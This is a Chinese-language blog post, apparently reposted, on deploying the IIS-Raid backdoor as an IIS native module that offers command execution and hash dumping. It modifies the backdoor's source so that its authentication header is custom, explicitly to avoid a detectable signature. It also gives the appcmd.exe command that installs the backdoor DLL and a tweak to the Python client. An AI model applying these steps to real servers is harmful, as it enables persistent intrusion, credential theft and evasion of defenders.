0×00 简介
之前刷TW的时候在墙外看到老外分享的这款使用IIS的本地模块构建IIS后门,功能可以自定义命令执行,dumhash等。感觉不错。于是下了下来试了下,测试有一点小瑕疵,随即修改了下,原版项目地址(https://github.com/0x09AL/IIS-Raid)。
0×01 安装和部署
自定义密码字段
在使用之前你得修改默认密码,已放置别人蹭你后门。代码在/module/Functions.h中定义,如下:
// Communication Header for the Response.#define COM_HEADER "X-Chrome-Variations"#define PASS_FILE "C://Windows//Temp//creds.db"#define PASSWORD "SIMPLEPASS"SIMPLEPASS 就是自定义的密码值,连接后门的时候在HttpHeader中定义,但是这里原版的定义密码的HTTP头字段始终是一个值(X-Password)。这无疑是一个典型的特征了,所以这里得实现自定义这个字段值,在以上定义代码中添加一个常量COM_PASSWD,如下代码:
// Communication Header for the Response.#define COM_HEADER "X-Chrome-Variations"#define COM_PASSWD "X-CT-BALA"#define PASS_FILE "C://Windows//Temp//creds.db"#define PASSWORD "SIMPLEPASS"然后再更改/module/HttpFactory.cpp39行代码替换掉X-Password值为自定义的常量,如下代码:
// Check the header password USHORT uPLen = 0; LPCSTR lpPassword = pHttpRequest->GetHeader(COM_PASSWD, &uPLen); if (lpPassword == NULL) { return RQ_NOTIFICATION_CONTINUE; } else if (strcmp(PASSWORD, lpPassword) != 0) { return RQ_NOTIFICATION_CONTINUE; }安装
安装比较简单,可以直接在命令行下使用appcmd.exe命令安装,命令如下:
C:/Windows/system32/inetsrv/APPCMD.EXE install module /name:Module Name /image:"%windir%/System32/inetsrv/IIS-Backdoor.dll" /add:true 安装成功后入下图所示:
0×02 使用
客户端是py写的一个脚本,但貌似编码有点问题,运行时候回报错,需要去掉py脚本里的banner字符串就可以正常了。如果自定义了密码字段名还需要修改下脚本以便支持自定义HTTP头字段。如下图:
添加个–headpass的命令行参数
把自定义的HTT头字段名加入到HttpHeader中
连接成功入后如下图所示:
0×03 参考
免责声明:本站某些文章、信息、图片、软件等来源于互联网,由本网整理发表,希望传递更多信息和学习之目的,并不意味赞同起观点或证实其内容的真实性以及非法用途。 如设计、版权等问题,请立即联系管理员,我们会给予更改或删除相关文章,保证您的权利。原文 https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/
评论